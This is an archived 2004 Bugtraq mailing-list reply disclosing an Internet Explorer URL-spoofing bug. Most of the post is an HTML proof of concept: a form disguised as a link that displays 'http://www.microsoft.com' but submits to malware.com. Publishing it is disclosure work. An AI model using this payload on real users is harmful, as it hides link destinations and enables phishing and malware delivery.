[37162] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Re: New URL spoofing bug in Microsoft Internet Explorer

daemon@ATHENA.MIT.EDU (http-equiv@excite.com)
Sat Oct 30 15:41:37 2004

Message-Id: <200410301816.i9UIG7cU017479@web111.megawebservers.com>
To: <bugtraq@securityfocus.com>
Date: Sat, 30 Oct 2004 18:16:07 -0000
From: "http-equiv@excite.com " <1@malware.com>
Cc: <NTBugtraq@listserv.ntbugtraq.com>
Reply-To: 1@malware.com



I also want to play

<base href="http://www.microsoft.com">

<a href=><form action="http://www.malware.com" 
method="get"><INPUT style="BORDER-RIGHT: 0pt; BORDER-TOP: 0pt; 
FONT-SIZE: 10pt; BORDER-LEFT: 0pt;
CURSOR: hand; COLOR: blue; BORDER-BOTTOM: 0pt; BACKGROUND-COLOR: 
transparent;TEXT-DECORATION: underline" type=submit 
value=http://www.microsoft.com></form></a>

This still works in IE 6 SP2 XP 123 whatever, since patched and 
from back in March 2004 [see: 
http://www.securityfocus.com/bid/10023 ]. Only difference being 
the base href and open a href.

http://www.malware.com/mwaresoft.html

Interestingly Outlook Express gets it right this time.



-- 
http://www.malware.com


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[37162] in bugtraq

Re: New URL spoofing bug in Microsoft Internet Explorer

daemon@ATHENA.MIT.EDU (http-equiv@excite.com)Sat Oct 30 15:41:37 2004

daemon@ATHENA.MIT.EDU (http-equiv@excite.com)
Sat Oct 30 15:41:37 2004